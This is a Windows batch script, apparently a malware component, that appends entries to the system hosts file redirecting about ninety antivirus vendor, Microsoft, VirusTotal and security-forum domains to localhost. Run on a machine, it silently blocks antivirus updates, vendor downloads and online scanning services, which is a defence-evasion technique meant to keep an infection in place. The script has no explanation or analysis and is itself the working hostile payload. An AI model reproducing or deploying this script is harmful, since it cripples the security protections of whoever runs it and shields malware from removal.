@echo off >Nul
set "local=127.0.0.1"
set "hosts=%windir%\System32\drivers\etc\hosts"
@echo. >>%hosts%
@echo %local%%nul% avast.com >>%hosts%
@echo %local%%nul% avp.com >>%hosts%
@echo %local%%nul% avira.com >>%hosts%
@echo %local%%nul% ca.com >>%hosts%
@echo %local%%nul% customer.symantec.com >>%hosts%
@echo %local%%nul% dispatch.mcafee.com >>%hosts%
@echo %local%%nul% download.mcafee.com >>%hosts%
@echo %local%%nul% eset.com >>%hosts%
@echo %local%%nul% f-secure.com >>%hosts%
@echo %local%%nul% kaspersky.com >>%hosts%
@echo %local%%nul% kaspersky-labs.com >>%hosts%
@echo %local%%nul% liveupdate.symantec.com >>%hosts%
@echo %local%%nul% liveupdate.symantecliveupdate.com >>%hosts%
@echo %local%%nul% mast.mcafee.com >>%hosts%
@echo %local%%nul% mcafee.com >>%hosts%
@echo %local%%nul% microsoft.com >>%hosts%
@echo %local%%nul% my-etrust.com >>%hosts%
@echo %local%%nul% nai.com >>%hosts%
@echo %local%%nul% networkassociates.com >>%hosts%
@echo %local%%nul% pandasoftware.com >>%hosts%
@echo %local%%nul% rads.mcafee.com >>%hosts%
@echo %local%%nul% secure.nai.com >>%hosts%
@echo %local%%nul% securityresponse.symantec.com >>%hosts%
@echo %local%%nul% sophos.com >>%hosts%
@echo %local%%nul% symantec.com >>%hosts%
@echo %local%%nul% trendmicro.com >>%hosts%
@echo %local%%nul% updates.symantec.com >>%hosts%
@echo %local%%nul% update.symantec.com >>%hosts%
@echo %local%%nul% us.mcafee.com >>%hosts%
@echo %local%%nul% viruslist.com >>%hosts%
@echo %local%%nul% virustotal.com >>%hosts%
@echo %local%%nul% www.avp.com >>%hosts%
@echo %local%%nul% www.f-secure.com >>%hosts%
@echo %local%%nul% www.grisoft.com >>%hosts%
@echo %local%%nul% www.kaspersky.com >>%hosts%
@echo %local%%nul% www.mcafee.com >>%hosts%
@echo %local%%nul% www.microsoft.com >>%hosts%
@echo %local%%nul% www.my-etrust.com >>%hosts%
@echo %local%%nul% www.nai.com >>%hosts%
@echo %local%%nul% www.networkassociates.com >>%hosts%
@echo %local%%nul% www.pandasoftware.com >>%hosts%
@echo %local%%nul% www.sophos.com >>%hosts%
@echo %local%%nul% www.symantec.com >>%hosts%
@echo %local%%nul% www.trendmicro.com >>%hosts%
@echo %local%%nul% www.virustotal.com >>%hosts%
@echo %local%%nul% www.safer-networking.org >>%hosts%
@echo %local%%nul% www.gdata-software.com >>%hosts%
@echo %local%%nul% www.avira.com >>%hosts%
@echo %local%%nul% www.clamav.net >>%hosts%
@echo %local%%nul% www.comodo.com >>%hosts%
@echo %local%%nul% www.drweb.com >>%hosts%
@echo %local%%nul% www.f-prot.com >>%hosts%
@echo %local%%nul% www.f-secure.com >>%hosts%
@echo %local%%nul% www.ikarussecurity.com >>%hosts%
@echo %local%%nul% www.kaspersky.com >>%hosts%
@echo %local%%nul% www.eset.com >>%hosts%
@echo %local%%nul% www.norman.com >>%hosts%
@echo %local%%nul% www.pandasecurity.com >>%hosts%
@echo %local%%nul% www.emsisoft.com >>%hosts%
@echo %local%%nul% www.quickheal.com >>%hosts%
@echo %local%%nul% www.srnmicro.com >>%hosts%
@echo %local%%nul% www.sophos.com >>%hosts%
@echo %local%%nul% www.trendmicro.com >>%hosts%
@echo %local%%nul% www.anti-virus.by >>%hosts%
@echo %local%%nul% www.zonerantivirus.cz >>%hosts%
@echo %local%%nul% www.lavasoft.com >>%hosts%
@echo %local%%nul% www.bullguard.com >>%hosts%
@echo %local%%nul% www.forticlient.com >>%hosts%
@echo %local%%nul% www.k7computing.com >>%hosts%
@echo %local%%nul% www.nanoav.ru >>%hosts%
@echo %local%%nul% www.superantispyware.com >>%hosts%
@echo %local%%nul% www.filseclab.com >>%hosts%
@echo %local%%nul% www.vipreantivirus.com >>%hosts%
@echo %local%%nul% www.malwarebytes.org >>%hosts%
@echo %local%%nul% www.avware.com.br >>%hosts%
@echo %local%%nul% www.aegislab.com >>%hosts%
@echo %local%%nul% www.agnitum.com >>%hosts%
@echo %local%%nul% www.ahnlab.com >>%hosts%
@echo %local%%nul% www.alibaba.com >>%hosts%
@echo %local%%nul% www.antiy.net >>%hosts%
@echo %local%%nul% www.arcabit.pl >>%hosts%
@echo %local%%nul% www.antivirus.baidu.com >>%hosts%
@echo %local%%nul% www.bkav.com >>%hosts%
@echo %local%%nul% www.bytehero.com >>%hosts%
@echo %local%%nul% www.cyren.com >>%hosts%
@echo %local%%nul% www.wilderssecurity.com >>%hosts%
@echo %local%%nul% www.rising-global.com >>%hosts%
@echo %local%%nul% www.hacksoft.com.pe >>%hosts%
@echo %local%%nul% www.hauri.net >>%hosts%
@echo %local%%nul% www.zillya.com >>%hosts%
@echo %local%%nul% www.avs.nprotect.com >>%hosts%

